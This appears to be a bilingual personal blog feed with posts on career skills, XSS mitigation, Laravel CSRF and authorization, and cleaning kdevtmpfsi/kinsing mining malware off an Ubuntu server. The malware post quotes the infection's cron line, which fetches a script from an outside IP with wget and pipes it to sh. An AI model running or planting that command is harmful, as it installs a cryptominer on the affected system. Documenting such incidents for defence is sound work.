发布于

Learn a Marketable Skill

In your twenties, life can be tough. You might find yourself struggling in the workforce, dealing with PUA (Psychological Manipulation) from bosses, managers, or small business owners. You’re not making money, and you might blame your upbringing—coming from a poor family, lacking in material wealth, mental resources, and even knowledge. It’s not your fault, right?

But in your thirties or forties, if you’re still finding it hard to make ends meet, then the blame falls squarely on you. You’re not putting in enough effort, not being ruthless enough, and most importantly, you haven’t learned a skill that guarantees your survival. You’ve wasted too many years without picking up something practical.

By “skill,” I mean something that can be monetized—blue-collar jobs like welding, auto repair, hairdressing, cooking, forklift driving, or truck driving. Or white-collar jobs like programming, writing, sales, accounting, finance trading, or legal consulting. If you’re not a government official’s child or a rich heir, you’ll have to master at least one of these.

If you want both financial security and freedom—what people often call “making money while standing”—you need to acquire a marketable skill.

As a grassroots worker, if you depend on a specific boss, team, or organization to make a living, over time, you’ll develop an unhealthy dependency. You become their servant, at their mercy, afraid to even quit.

But if you’re living off a marketable skill, no one or organization can enslave you. Your skill is market-driven—if you’re unhappy with one company, you can quit and take a break. When you’re ready, you can join another company, or even start your own business.

Remember, happiness comes from freedom, and freedom comes from courage and perseverance.

发布于

学一门市场化的手艺

二十来岁,你在社会上混得很艰难,被别人(领导、上司、小老板)各种PUA,赚不到钱,大概是你的原生家庭太穷了,物质上穷,精神上穷,认知上也穷,不是你个人的原因。

但是三四十岁,如果你还是在社会上混得很艰难,赚不到钱,那就只能怪你自己了。不够努力,不够狠心,没有学会一门安身立命的手艺,白混了这么多年的社会。

手艺,例如蓝领的电焊、汽修、理发、厨师、叉车、货车等,白领的编程、写作、销售、会计、金融交易、法律咨询等,如果你不是官富二代,你总是要学会一门的。

如果你既想要获得金钱又要获得自由,也就是俗话说的“站着把钱赚了”,你就应该学一门市场化的手艺。

你作为一个草根,如果靠某个领导、某个团队或某个组织而生存的,久而久之你就会对他们形成人生依附,变成了他们的家奴,被他们肆意拿捏,都不敢辞职。

如果你靠一门市场化的手艺而生存,靠自己的手艺吃饭,这样没有人或组织能够奴役你。因为你的技能是市场化的,这个公司或单位干得不爽了,你完全可以辞职休息一段时间,然后去另一个公司或单位照样干活,甚至自己当老板。

记住,幸福源自自由,自由源自勇气和坚忍。

发布于

Cross-Site Scripting (XSS) Attacks and Mitigation Methods

XSS (Cross-Site Scripting) is a malicious attack where an attacker injects harmful JavaScript code into a web page. When a user visits the page, the embedded JavaScript executes, allowing the attacker to target the user with malicious actions.

A common form of XSS attack is cookie theft. Websites often use cookies to identify users. If an attacker can execute JavaScript on a page, they can read and steal the user’s cookies. Once the attacker has access to the cookies, they can impersonate the user and log in to the website.

There are three primary ways to mitigate XSS attacks:

  1. Filtering User Input: Implement a “whitelist” approach to filter out potentially dangerous HTML tags and attributes. Only allow the tags and attributes deemed safe to be sent to the server, blocking everything else. This method helps prevent various forms of XSS attacks.
  2. Special Handling of Data: Use methods like PHP’s htmlspecialchars() to escape potentially harmful characters when rendering data on the webpage, ensuring that JavaScript code is not executed.
  3. Content Security Policy (CSP): Implementing a Content Security Policy (CSP) can help prevent XSS attacks by specifying trusted sources for content, restricting the execution of untrusted scripts.
发布于

跨站脚本(Cross-site Scripting,XSS)攻击及防范方法

XSS 也称跨站脚本攻击 (Cross Site Scripting),恶意攻击者往 Web 页面里插入恶意 JavaScript 代码,当用户浏览该页之时,嵌入其中 Web 里面的 JavaScript 代码会被执行,从而达到恶意攻击用户的目的。

一种比较常见的 XSS 攻击是 Cookie 窃取。我们都知道网站是通过 Cookie 来辨别用户身份的,一旦恶意攻击者能在页面中执行 JavaScript 代码,他们即可通过 JavaScript 读取并窃取你的 Cookie,拿到你的 Cookie 以后即可伪造你的身份登录网站。

有三种方法可以避免 XSS 攻击:
第一种,对用户提交的数据进行过滤。使用『白名单机制』对 HTML 文本信息进行 XSS 过滤,只通过我们认为安全的标签和属性到服务器端,未知的全部过滤掉。这种过滤机制可以有效地防止各种 XSS 变种攻击。
第二种,Web 网页显示时对数据进行特殊处理,例如PHP使用htmlspecialchars()输出。
第三种,使用内容安全策略(Content Security Policy, CSP)防止XSS攻击。

参考
https://learnku.com/courses/laravel-intermediate-training/9.x/safety-problem/12512

发布于

When Clients Don’t Need to Initialize CSRF Tokens in Laravel

In Laravel, clients don’t need to initialize CSRF tokens under the following conditions:

  • Cookie and Session-based Authentication: When using cookie and session-based user authentication, and the route being accessed is part of web.php with the App\Http\Middleware\VerifyCsrfToken middleware enabled, CSRF tokens are required.
发布于

Authorization Points in the Laravel Framework (Where Authorization Takes Place)

In the Laravel framework, authorization can be implemented in the following places:

  • Using the can Middleware: This middleware allows for permission checks at the route level, providing an easy way to ensure that the user has the required authorization.
  • Using the authorize Method in Form Request Validation Classes: The authorize method is used to determine whether the user is authorized to make a given request. Note that if you generate a form request validation class using the php artisan command, it will come with a default return false in the authorize method.
  • Using authorize, can, or cannot Methods in Controller Actions: Within controller methods, you can use these methods to check if the user has the required permissions before performing an action.
  • Using @can and @cannot Directives in Blade Templates: These Blade directives allow you to conditionally display content based on whether the user has a specific ability or permission.
  • Using Sanctum Token Abilities: When using Sanctum for API authentication, you can define and check token abilities to manage access at a granular level.
发布于

Laravel框架的鉴权点(在框架的哪些地方鉴权)

可以在Laravel框架的以下地方鉴权:

  • 使用can中间件
  • 使用表单请求数据验证类的authorize方法。注意,使用php artisan命令创建的表单请求数据验证类,默认包含return false的authorize方法
  • 在控制器的方法里使用authorize、can、cannot等方法
  • 在Blade模板中使用@can、@cannot等指令
  • 使用Sanctum的令牌能力

发布于

How to Fix the kdevtmpfsi and kinsing Mining Virus Infection on an Ubuntu Server

My server is running Ubuntu 24. Today, after installing and configuring a WordPress blog based on Nginx 1.24, PHP 8.3, and MySQL 8.0, I ran the following command to check the server load:

$ top -i

I noticed that the kdevtmpfsi process was using 100% of the CPU. A quick search revealed that this is a malicious mining process. Typically, two malicious mining processes—kdevtmpfsi and kinsing—are found together. Here’s how I resolved the issue:

Step 1: Kill the kdevtmpfsi and kinsing Processes

First, find the process ID (PID) for kdevtmpfsi and kill it:

$ ps aux | grep kdevtmpfsi | awk '{print $2}' | xargs sudo kill -9

Next, find the PID for kinsing and kill it:

$ ps aux | grep kinsing | awk '{print $2}' | xargs sudo kill -9

Step 2: Find and Remove the Malicious Program Files

Now, search for and remove any files associated with kdevtmpfsi and kinsing:

$ sudo find / -iname kdevtmpfsi* -exec rm -fv {} \;
$ sudo find / -iname kinsing* -exec rm -fv {} \;

The output should look like this:

removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'

Step 3: Check for Scheduled Tasks Set by www-data User

The top -i command showed that the user running the kdevtmpfsi process was www-data, so I checked the scheduled tasks for this user:

$ sudo crontab -l -u www-data

I found the following task:

* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

This cron job downloads and executes the unk.sh script, which in turn downloads and runs the kdevtmpfsi and kinsing programs. To remove this scheduled task, I ran:

$ sudo crontab -r -u www-data

Then, I deleted the unk.sh script:

$ sudo find / -iname unk.sh -exec rm -fv {} \;

Step 4: Create Non-Executable Placeholder Files for kdevtmpfsi and kinsing

To prevent the kdevtmpfsi and kinsing files from being executed again, I created them as non-executable placeholder files and set them to read-only:

$ touch /tmp/kdevtmpfsi && touch /tmp/kinsing
$ echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
$ echo "kinsing is fine now" > /tmp/kinsing
$ chmod 0444 /tmp/kdevtmpfsi
$ chmod 0444 /tmp/kinsing

This ensures that these files are no longer executable and cannot run.

Step 5: Enable UFW Firewall and Block Malicious IP

I enabled the UFW firewall and blocked access from the IP address 185.122.204.197, which was being used for the malicious downloads:

$ sudo ufw allow ssh
$ sudo ufw enable
$ sudo ufw allow http
$ sudo ufw allow https
$ sudo ufw deny from 185.122.204.197

To check the UFW status:

$ sudo ufw status numbered

Step 6: Restrict PHP-FPM to Localhost

According to online resources, this issue is likely due to the php-fpm service exposing port 9000 to the internet. To fix this, I edited the php-fpm configuration file:

$ sudo vim /etc/php/8.3/fpm/pool.d/www.conf

I changed the following line:

listen = 9000

to:

listen = 127.0.0.1:9000

This restricts php-fpm to only listen on the local 127.0.0.1 IP address. To apply the changes, I restarted the php-fpm service:

$ sudo systemctl restart php8.3-fpm

Reference:

发布于

Ubuntu服务器感染了挖矿病毒程序kdevtmpfsi和kinsing的解决方法

我的服务器的操作系统是Ubuntu 24。今天安装并配置了Wordpress博客,基于Nginx 1.24 + PHP 8.3 + MySQL 8.0。我运行以下命令查看服务器负载:
$ top -i
发现kdevtmpfsi进程CPU使用率达到100%。网上查了一下,说它是恶意的挖矿进程。一般同时存在两个恶意的挖矿进程:kdevtmpfsi和kinsing。解决步骤如下。

第一步,查找kdevtmpfsi进程的id并杀死:
$ ps aux | grep kdevtmpfsi | awk '{print $2}' | xargs sudo kill -9
查找kinsing进程的id并杀死:
$ ps aux | grep kinsing | awk '{print $2}' | xargs sudo kill -9

第二步,使用以下命令查找并删除kdevtmpfsi和kinsing进程对应的程序文件:

$ sudo find / -iname kdevtmpfsi* -exec rm -fv {} \;
$ sudo find / -iname kinsing* -exec rm -fv {} \;

输出应如下所示:

removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'

第三步,top -i命令显示运行kdevtmpfsi进程的用户是www-data用户,因此查看www-data用户设置的计划任务:

$ sudo crontab -l -u www-data
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

果然有,这个计划任务的功能是每隔一定时间就下载并运行unk.sh脚本程序,这个脚本程序会下载kdevtmpfsi和kinsing程序并启动运行。删除www-data用户的计划任务:
$ sudo crontab -r -u www-data
删除unk.sh脚本文件:
$ sudo find / -iname unk.sh -exec rm -fv {} \;

第四步,创建自己的kdevtmpfsi和kinsing文件并将其设置为只读:

$ touch /tmp/kdevtmpfsi && touch /tmp/kinsing
$ echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
$ echo "kinsing is fine now" > /tmp/kinsing
$ chmod 0444 /tmp/kdevtmpfsi
$ chmod 0444 /tmp/kinsing

这么做后kdevtmpfsi和kinsing文件就不是可执行程序了,就无法运行起来了。

第五步,启动UFW防火墙并禁止185.122.204.197这个IP对我当前的服务器的访问:

$ sudo ufw allow ssh
$ sudo ufw enable
$ sudo ufw allow http
$ sudo ufw allow https
$ sudo ufw deny from 185.122.204.197

查看UFW状态:
$ sudo ufw status numbered

根据网上的资料,这个问题很可能是php-fpm服务暴露9000端口到互联网引起的,因此修改php-fpm配置文件:
$ sudo vim /etc/php/8.3/fpm/pool.d/www.conf
把以下这行:
listen = 9000
改为:
listen = 127.0.0.1:9000
意思是php-fpm服务只监听本机127.0.0.1这个IP地址。重启php-fpm服务使配置文件的修改生效:
$ sudo systemctl restart php8.3-fpm

参考
https://stackoverflow.com/questions/60151640/kdevtmpfsi-using-the-entire-cpu